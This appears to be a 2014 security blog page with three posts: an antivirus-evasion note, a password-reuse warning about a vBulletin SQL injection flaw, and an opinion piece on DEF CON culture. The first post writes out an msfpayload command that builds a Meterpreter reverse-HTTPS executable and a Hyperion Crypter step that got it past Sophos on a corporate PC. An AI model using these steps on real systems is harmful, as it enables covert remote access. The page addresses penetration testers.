Tuesday, July 22, 2014

Obfy,Hyperion Crypter, and bypassing AV

I've noticed for a while now that payloads made by obfy that are encrypted with Hyperion Crypter don't seem to work on my system. I figured I screwed up crypter on my VM. But that isn't it, something else is wrong, I think.

First let me say there is a new version of Hyperion Crypter, you should download it and compile and install it.

Now with that out of the way I'm testing Sophos right now. While obfy by itself seems to still bypass McAfee with no issues it doesn't get past Sophos and with the crypter part broken I needed to do something else. So I tried smbexec and it worked fine against Sophos and I noted that the payload was encrypted by crypter and it worked. Note the compile and install it link above for smbexec and crypter info if that is new to you. So that got me wondering. Next I made a simple payload:
msfpayload windows/meterpreter/reverse_https LHOST= LPORT=443 X >payload.exe
Then I ran crypter.exe on it:
cd /opt/crypter (crypter only seems to work while you are in the directory)
wine ./crypter.exe /root/payload.exe payloadc.exe

Payload.exe was picked up by Sohpos and will be by any AV program. But pyaloadc.exe worked fine and the shell worked. Simple as that. No viel framework, smbexec, encoding, magic or anything needed. msfpayload generated exe file ran though crypter.exe and Sohpos is fine with it. Two steps and easy (it should be noted this is the Sophos install I'm testing against which is a live corp PC and not managed/installed by me so it may or may not be everything they can do to detect payloads, configured well, etc).

This goes to show different AV bypassing techniques work better for different vendors and having many tools to pull from is your best option. That said, it annoys me why crypter.exe creates broken executables with obfy files but not msfpayload files and I don't know why or why it suddenly stopped working when I didn't change anything. I don't even know if this is a problem with everyone or just me.

If you use this tool and have feedback let me know. If I hear that it doesn't work for other people too and collectively we can't figure out why I will probably pull that option from the code. In reality the more powerful part of obfy is altering the ASM of just about any ASM file you feed into it quickly to save you the time of doing it manually. In that case it is still a nice supporting tool, and of course for the time being a bypass McAfee button for some strange reason. I expect that part to stop working, someday.

Friday, July 18, 2014

Change your password gamers

A quick note for all you online gamers out there. If you play online games, MMO's, etc and have for a while you probably have joined a fair number of online gaming boards over the years. Guild after guild most likely, plus alliance after alliance if you play EVE. A good number of those sites are running VBulletin software. If you game a lot you probably recognize a VBulletin site without even having to scroll down to the bottom and see the logo and are happy to see it and not a less friendly free forum site. Well there is a new SQLi attack for the 5.X branch of that software and the people who found it said they will release the code in the wild soon. The official announcement is here: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4097503-security-patch-release-for-vbulletin-5-0-4-5-0-5-5-1-0-5-1-1-and-5-1-2

It should be noticed this isn't the first SQLi attack found in this software over the years. But I have a feeling this one is going to be used a lot so I'm giving this warning.

For those who don't know, a SQLi attack allows people to collect data from the database the site uses to store things like, say, your username and password. VBulletin by default stores passwords using an MD5 hash and a 3 character salt. If you don't know what that means, just know it means it is easy to crack and get your password, especially weak ones. No biggie right? Well ask yourself...

On any of these numerous sites you signed up to over the years (god help EVE players they probably can't even find all the old alliance ones), how easy it is for someone to find the game or games you play and the username you use to login with? If you are good your login name is nowhere on any of these sites for most games and your account names aren't the same or a single character off from them. Some games like ESO are idiotic and force you to tell everyone your login name however. If by chance you play ESO or one of your character's name is also your login name for a game and you give that name up in posts or signatures or profiles in forums all over the Internet, ask yourself this. Did you use the same password on one or more game forum that you use to login to the game with? If so, you are either going to spend some time changing passwords, or learn a life lesson the hard way when your account is banned for gold selling or something and when you finally get it unbanned you have nothing even your characters are deleted,

Think about it. You should never use game password on forum sites, ever, ever, ever. And changing 1 character at the end isn't clever enough not to get figured out btw.

So if you are freaking right now do this:
1. Stop using your character name as your login name where you can help it (ESO aside that was a bad move on their part)
2. Never use passwords for games on any other website
3. Go change all your game passwords

If you share passwords you likely don't have a system and/or password manager. Here is some final advice.
Come up with a system to help you remember passwords without sharing them. Like incorporating part of the same of the site into the password.
Use a password manager. Here are three I like:
LastPass: Web plugin cross platform. My current option due to the cross platform, free
KeePass: Good stand alone one for Windows, I found it annoying on the Mac, free
PINs: Good stand alone on for Windows, older now but still good and doesn't need an install. The password file and the exe is all you need and it works so it is 100% portable, but Windows only, free

Thursday, July 17, 2014

It is time for DEF CON to grow up

I've been putting this blog post off for a while and I've read a few others like it while I've been putting it off so I almost didn't bother. But I think I have something slightly different to say so I decided it was worth it. Let me start from the beginning. DEF CON is special to me. DEF CON 8 was pure magic in my life, that was my first one and it changed my life. I've been to every one since except for one due to the birth of my child which was poor planing on my part. So what I say is with love and real feedback.

At DEF CON 8 it was also my first trip to Vegas. All the half dressed women walking around some handing out floppy disk with nude pics of themselves on them was part of the Vegas experience to me. I loved it. But that was a long time ago. I recently had to explain to a good female friend of mine that was wanting to go to DEF CON that it was probably a bad idea. I did it by explaining in detail how Hacker Jeopardy worked. Oh..she said. Then I had to explain that a good number of con goers have limited social skills and it would be highly likely for her to get stared at and inappropriately propositioned during the con and the Goons would almost certainly ignore any complaints about it. She decided not to go, which I thought was wise.

That conversation got me wondering, do I want my daughter to go when she is old enough? I've always wanted that since I had kids but the more I think of it, the more the answer is no, unless the con grows up. It will be a world she will be unfamiliar with and I don't want to expose it to her in that way. In short, DEF CON's attitude about women is roughly based on a young white male's attitude was roughly 20 years ago.

So, it is past time for DEF CON to grow up. It is no more appropriate for DEF CON to still have 20 year old attitudes about women then it would be for say a southern country club to still have 50 year old attitudes about race. There should be no objectifying women in any official event, which would include no striping in Hacker Jeopardy. Women and men not wearing enough cloths should be asked to leave until fully dressed. Goon's should be trained to not only deal with inappropriate and unwanted advances and comments properly but should look for them and act upon them even if the victim doesn't complain since the problem is already well known. That should hopefully set the tone and change the culture and after a year or two the Goon's could back off a bit.

I don't think any of this will happen. That said my plan this year is to skip Black Hat and go to B-Sides Vegas instead. I plan to go to DEF CON but I don't plan to spend a dime on anything but a badge. Not a huge protest I know, but it is a start and like I said, DEF CON is special to me. I'll see how things go. If nothing changes this year and there is nothing to make me thing it will be different next year, I probably won't be going back to DEF CON after this year until I hear they have changed. There is no reason to put up with it anymore. B-Sides in many cities are great and DerbyCon is great.

I recommend everyone else that goes think about this as well and if it matters to you start making your voices heard and stop going if they don't listen. Times are different, we can skip DEF CON without missing out and I'm starting to think we should.